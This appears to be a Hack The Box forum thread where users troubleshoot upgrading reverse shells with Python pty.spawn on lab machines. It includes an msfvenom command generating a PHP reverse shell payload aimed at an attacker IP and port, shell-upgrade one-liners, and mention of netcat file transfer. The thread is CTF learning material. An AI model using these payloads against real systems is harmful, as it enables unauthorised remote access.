Python pty.spawn not working

Yea I was already certain I had run it both ways just to make sure, but I just went and checked again, copy and pasted your command, and still nothing. My shell doesn’t exit necessarily, just seems to kind of hang

Ok - that is a little bit odd.

For clarity, when you run python -c import pty; pty.spawn("/bin/sh") it should hang because all you’ve done is run python -c import pty and then tried to issue a python command to the shell interpreter.

However if you have enclosed the whole string, it should be treated as a blob to pass to python. This doesn’t always work (I find “shell upgrades” break often enough that I only do them if I really, really need to), but I get you are following a walkthrough where it is used, so it should work unless something on the box has changed since then.

Try it with a bash shell to see if that makes a difference.

I was using a bash shell, but I tried both for the sake of being thorough. I’m not even following the walkthrough necessarily in order to exploit the machine. The only reason I pulled it up in the first place was because my shell upgrade wasn’t working and I wanted to double check that I wasn’t doing anything wrong. However we both get a shell via nc, and running the code on the machine, then his upgrade works and mine doesnt. So I’m just at a loss.

Again I’m new, this is the msfvenom command I’m using,
msfvenom -p php/reverse_php LHOST=10.10.14.54 LPORT=1234 -f raw > shell2.htb

any red flags there?

EDIT: I guess I should mention the .htb extention is being run as .php by the server. Not sure if you would know/remember that if you maybe haven’t done the box before or in a while since you’re more advanced than I am

What is the machine?

I’ve had trouble with msf PHP shells before where I couldn’t run certain interactive commands. I try to stay away from them when I can. It’s been a while though since I’ve seen this.
You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

@TazWake said:
What is the machine?

I just try to run following on the foothold of Magic, not working.
python3 -c ‘import pty; pty.spawn(“/bin/sh”)’

Type your comment> @6uta said:

(Quote)
I just try to run following on the foothold of Magic, not working.
python3 -c ‘import pty; pty.spawn(“/bin/sh”)’

Hey. The command is right.
Try socat interactive shell, if python/python3 is not present.
But I’m sure your command is right.

What response exactly you get after executing python pty script?

Type your comment> @zaicurity said:

I’ve had trouble with msf PHP shells before where I couldn’t run certain interactive commands. I try to stay away from them when I can. It’s been a while though since I’ve seen this.
You could try getting a shell through another method (e.g. a simple php webshell and then running a reverse shell one-liner as the command).

Maybe because I don’t know it well enough, but I never understood the fuss of metasploit: it’s confusing that it’s like a shell but not really and if you get used to it: on any half decent windows machine the av will pick it up and throw you out.
Never even thought of using it. I just don’t like to use stuff that I don’t know what it’s doing exactly… The benefits I know of don’t compare to all the downsides I experienced with it.

That being said: @6uta, you generated a meter prefer payload, and you try to upgrade that session to one with auto complete. That it?

Not sure if meterprefer can. My suggestion would be to stay away from meter prefer sessions whenever you have a choice.

@6uta said:

I just try to run following on the foothold of Magic, not working.
python3 -c ‘import pty; pty.spawn(“/bin/sh”)’

That should work on Magic. When you say it is “not working” , what actually happens? Does nothing happen or do you get an error message?

@gnothiseauton

Maybe because I don’t know it well enough, but I never understood the fuss of metasploit:

I agree. Sometimes it can make life easier but all too often the varying payloads just confuse people. People expect everything to be a meterpreter shell but it rarely works that way.

If you need a shell that can use su or sudo, you can use /usr/bin/script -qc /bin/bash /dev/null on any linux box as far as I know. It won’t give you tab complete or command history, though.

@TazWake agreed man.

Type your comment> @TazWake said:

@6uta said:

I just try to run following on the foothold of Magic, not working.
python3 -c ‘import pty; pty.spawn(“/bin/sh”)’

That should work on Magic. When you say it is “not working” , what actually happens? Does nothing happen or do you get an error message?

Sorry to not describe clearly.
The php reverse shell become unresponsive once I sent: python -c “import pty; pty.spawn(‘/bin/bash’);”
But everything is working fine if I use perl reverse shell.

@6uta said:

Sorry to not describe clearly.
The php reverse shell become unresponsive once I sent: python -c “import pty; pty.spawn(‘/bin/bash’);”
But everything is working fine if I use perl reverse shell.

Glad to hear you’ve got a solution, even if it is far from ideal.

I’ve just tried on Magic and this worked python3 -c 'import pty; pty.spawn("/bin/bash")' but I cant see why using the double/single quotes the other way round should make a difference.

I’m having the same issue. But in my case, it closes out my reverse connection and knocks me to my host machine terminal.

Here is the output -

What will be a solution for this? @TazWake

I am not sure. Does this happen every time you try it? How long can you keep a shell if you don’t try to upgrade it?

You dont actually need an upgraded shell on the box you are looking at there.

As an alternative, you could try using Metasploit as that definitely works with the shell upgrade you’ve tried.

But, realistically, other than a more attractive path shown on the command line, there isn’t a huge advantage to doing this.

. Sorry this was mistake comment.

@dbstart09, it kind of looks like instead of using a single quote, you used the tick mark under the tilda. If it is in fact a single quote, then I’m not sure why it’s not working for you.

Thanks, @TazWake and @marlasthemage now I got the shell as tomcat.

But now a new problem is what to do next. Whenever I go each directory only has read-only permissions. Try to download linpeas but getting this “Could not resolve the hostname: github.com”.

Eventually, tried Netcat listener on tomcat shell and sent linpeas from my local machine. Now I can’t run it. With sudo it asks for the password for tomcat and I put what I have but no use at all.

Any hint on what to try next?

TIA

@dbstart09 said:

Thanks, @TazWake and @marlasthemage now I got the shell as tomcat.

But now a new problem is what to do next. Whenever I go each directory only has read-only permissions. Try to download linpeas but getting this “Could not resolve the hostname: github.com”.

Eventually, tried Netcat listener on tomcat shell and sent linpeas from my local machine. Now I can’t run it. With sudo it asks for the password for tomcat and I put what I have but no use at all.

Any hint on what to try next?

You will get better answers if you ask this on the thread for the specific box.

Most HTB boxes will prevent you accessing internet resources. You need to download to your machine and then upload to the box.

If things are read-only, you can still read them.